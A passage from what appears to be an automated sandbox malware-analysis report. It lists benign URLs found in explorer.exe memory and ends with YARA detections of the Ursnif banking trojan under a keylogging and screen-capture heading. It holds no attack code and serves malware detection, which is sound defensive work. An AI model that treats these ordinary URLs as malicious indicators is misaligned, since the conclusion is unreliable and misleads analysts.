            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000024.00000002.674152655.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.19.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000024.00000000.659633766.0000000007CC8000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml2.19.dr | String found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml3.19.dr | String found in binary or memory: http://www.live.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml4.19.dr | String found in binary or memory: http://www.nytimes.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml5.19.dr | String found in binary or memory: http://www.reddit.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml6.19.dr | String found in binary or memory: http://www.twitter.com/
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml7.19.dr | String found in binary or memory: http://www.wikipedia.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml8.19.dr | String found in binary or memory: http://www.youtube.com/
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
